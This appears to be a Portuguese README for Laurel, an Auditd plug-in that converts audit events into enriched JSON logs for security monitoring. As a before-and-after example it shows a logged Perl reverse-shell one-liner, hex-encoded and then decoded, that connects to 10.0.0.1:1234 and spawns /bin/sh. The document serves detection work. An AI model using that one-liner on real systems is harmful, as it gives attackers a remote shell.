laurel
v0.6.4
Laurel é um plug-in de pós-processamento de eventos para Auditd (8) que gera logs de auditoria úteis e enriquecidos baseados em JSON, adequados para configurações modernas de monitoramento de segurança.
A documentação correspondente à versão estável mais recente pode ser encontrada aqui.
TLDR: em vez de eventos de auditoria que se parecem assim ...
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
… Laurel os transforma em logs JSON, onde a bagunça que os atacantes/testadores de penetração/equipes vermelhas estão tentando fazer se torna aparente à primeira vista:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}
Isso acontece na fonte porque Laurel é executado no host, onde os eventos de auditoria são gerados. Os eventos são enriquecidos com informações úteis sobre o processo pai (PPID):
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
Detalhes de configuração e operacional são descritos na página manual de Laurel (8). Detalhes sobre o formato de log e as justificativas podem ser encontradas na página manual de Laurel (7). A página Laurel-Audit-Rules (7) contém conselhos e exemplos para configurar regras de auditoria úteis para detectar as táticas dos atacantes.
As instruções de instalação de Laurel contêm instruções sobre como construir Laruel a partir da fonte e como instalá -lo e configurá -lo.
Desenvolvemos Laurel porque não nos contentamos com conjuntos de recursos e características de desempenho dos projetos e produtos existentes. Consulte o documento de desempenho para obter detalhes.
GNU Licença pública em geral, versão 3
O logotipo foi criado por Birgit Meyer <[email protected]>.
